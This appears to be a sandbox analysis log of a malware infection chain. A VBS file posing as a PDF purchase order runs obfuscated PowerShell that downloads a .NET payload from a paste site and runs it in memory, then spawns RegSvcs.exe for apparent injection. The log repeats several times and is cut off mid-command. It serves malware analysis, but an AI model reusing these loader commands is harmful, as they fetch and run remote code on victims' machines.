"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bw▒GI▒cwB4▒GU▒I▒▒9▒C▒▒Jw▒w▒DM▒N▒▒n▒Ds▒J▒Br▒GU▒bgBx▒Hg▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒Bu▒HU▒c▒Bk▒Gc▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒c▒Bh▒HM▒d▒Bl▒Gk▒bw▒u▒GM▒bwBt▒C8▒Z▒Bv▒Hc▒bgBs▒G8▒YQBk▒C8▒e▒Bj▒Hg▒VwB2▒Hk▒awBm▒G0▒Mw▒w▒GE▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒G4▒dQBw▒GQ▒Zw▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒MQ▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒ag▒1▒DM▒MQ▒4▒Gk▒SwBX▒C8▒dwBh▒HI▒LwBt▒G8▒Yw▒u▒G4▒aQBi▒GU▒d▒Bz▒GE▒c▒▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Gs▒ZQBu▒HE▒e▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒c▒Bi▒HM▒e▒Bl▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs');powershell -command $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$pbsxe = '034';$kenqx = 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs';[Byte[]] $nupdg = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://pasteio.com/download/xcxWvykfm30a'));[system.AppDomain]::CurrentDomain.Load($nupdg).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('j5318iKW/war/moc.nibetsap//:sptth' , $kenqx , '_______________________-------------', $pbsxe, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Copy-Item 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:912

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
PID:2360

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2540

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bw▒GI▒cwB4▒GU▒I▒▒9▒C▒▒Jw▒w▒DM▒N▒▒n▒Ds▒J▒Br▒GU▒bgBx▒Hg▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒Bu▒HU▒c▒Bk▒Gc▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒c▒Bh▒HM▒d▒Bl▒Gk▒bw▒u▒GM▒bwBt▒C8▒Z▒Bv▒Hc▒bgBs▒G8▒YQBk▒C8▒e▒Bj▒Hg▒VwB2▒Hk▒awBm▒G0▒Mw▒w▒GE▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒G4▒dQBw▒GQ▒Zw▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒MQ▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒ag▒1▒DM▒MQ▒4▒Gk▒SwBX▒C8▒dwBh▒HI▒LwBt▒G8▒Yw▒u▒G4▒aQBi▒GU▒d▒Bz▒GE▒c▒▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Gs▒ZQBu▒HE▒e▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒c▒Bi▒HM▒e▒Bl▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs');powershell -command $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$pbsxe = '034';$kenqx = 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs';[Byte[]] $nupdg = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://pasteio.com/download/xcxWvykfm30a'));[system.AppDomain]::CurrentDomain.Load($nupdg).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('j5318iKW/war/moc.nibetsap//:sptth' , $kenqx , '_______________________-------------', $pbsxe, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Copy-Item 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2148

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
PID:5472

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
PID:5476

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2040

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bw▒GI▒cwB4▒GU▒I▒▒9▒C▒▒Jw▒w▒DM▒N▒▒n▒Ds▒J▒Br▒GU▒bgBx▒Hg▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒Bu▒HU▒c▒Bk▒Gc▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒c▒Bh▒HM▒d▒Bl▒Gk▒bw▒u▒GM▒bwBt▒C8▒Z▒Bv▒Hc▒bgBs▒G8▒YQBk▒C8▒e▒Bj▒Hg▒VwB2▒Hk▒awBm▒G0▒Mw▒w▒GE▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒G4▒dQBw▒GQ▒Zw▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒MQ▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒ag▒1▒DM▒MQ▒4▒Gk▒SwBX▒C8▒dwBh▒HI▒LwBt▒G8▒Yw▒u▒G4▒aQBi▒GU▒d▒Bz▒GE▒c▒▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Gs▒ZQBu▒HE▒e▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒c▒Bi▒HM▒e▒Bl▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs');powershell -command $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5304

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$pbsxe = '034';$kenqx = 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs';[Byte[]] $nupdg = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://pasteio.com/download/xcxWvykfm30a'));[system.AppDomain]::CurrentDomain.Load($nupdg).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('j5318iKW/war/moc.nibetsap//:sptth' , $kenqx , '_______________________-------------', $pbsxe, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Copy-Item 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4080

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5464

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5444

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs"
1⤵
- Checks computer location settings
PID:4680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bw▒GI▒cwB4▒GU▒I▒▒9▒C▒▒Jw▒w▒DM▒N▒▒n▒Ds▒J▒Br▒GU▒bgBx▒Hg▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒Bu▒HU▒c▒Bk▒Gc▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒c▒Bh▒HM▒d▒Bl▒Gk▒bw▒u▒GM▒bwBt▒C8▒Z▒Bv▒Hc▒bgBs▒G8▒YQBk▒C8▒e▒Bj▒Hg▒VwB2▒Hk▒awBm▒G0▒Mw▒w▒GE▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒G4▒dQBw▒GQ▒Zw▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒MQ▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒ag▒1▒DM▒MQ▒4▒Gk▒SwBX▒C8▒dwBh▒HI▒LwBt▒G8▒Yw▒u▒G4▒aQBi▒GU▒d▒Bz▒GE▒c▒▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Gs▒ZQBu▒HE▒e▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒c▒Bi▒HM▒e▒Bl▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs');powershell -command $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$pbsxe = '034';$kenqx = 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs';[Byte[]] $nupdg = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://pasteio.com/download/xcxWvykfm30a'));[system.AppDomain]::CurrentDomain.Load($nupdg).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('j5318iKW/war/moc.nibetsap//:sptth' , $kenqx , '_______________________-------------', $pbsxe, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Copy-Item 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4640

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4444

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs"
1⤵
- Checks computer location settings
PID:2584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bw▒GI▒cwB4▒GU▒I▒▒9▒C▒▒Jw▒w▒DM▒N▒▒n▒Ds▒J▒Br▒GU▒bgBx▒Hg▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒Bu▒HU▒c▒Bk▒Gc▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒c▒Bh▒HM▒d▒Bl▒Gk▒bw▒u▒GM▒bwBt▒C8▒Z▒Bv▒Hc▒bgBs▒G8▒YQBk▒C8▒e▒Bj▒Hg▒VwB2▒Hk▒awBm▒G0▒Mw▒w▒GE▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒G4▒dQBw▒GQ▒Zw▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒MQ▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒ag▒1▒DM▒MQ▒4▒Gk▒SwBX▒C8▒dwBh▒HI▒LwBt▒G8▒Yw▒u▒G4▒aQBi▒GU▒d▒Bz▒GE▒c▒▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Gs▒ZQBu▒HE▒e▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒c▒Bi▒HM▒e▒Bl▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs');powershell -command $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3724

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$pbsxe = '034';$kenqx = 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs';[Byte[]] $nupdg = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://pasteio.com/download/xcxWvykfm30a'));[system.AppDomain]::CurrentDomain.Load($nupdg).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('j5318iKW/war/moc.nibetsap//:sptth' , $kenqx , '_______________________-------------', $pbsxe, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Copy-Item 'C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3852

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
PID:2088

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1460

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\PO_978585_Windshield_&_Escape_Slide.pdf.vbs"
1⤵
- Checks computer location settings
PID:5584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bw▒GI▒cwB4▒GU▒I▒▒9▒C▒▒Jw▒w▒DM▒N▒▒n▒Ds▒J▒Br▒GU▒bgBx▒Hg▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒Bu▒HU▒c▒Bk▒Gc▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒c▒Bh▒HM▒d▒Bl▒Gk▒bw▒u▒GM▒bwBt▒C8▒Z▒Bv▒Hc▒bgBs▒G8▒YQBk▒C8▒e▒Bj▒Hg▒VwB2▒Hk▒awBm▒G0▒Mw▒w▒GE▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒G4▒dQBw▒GQ▒Zw▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒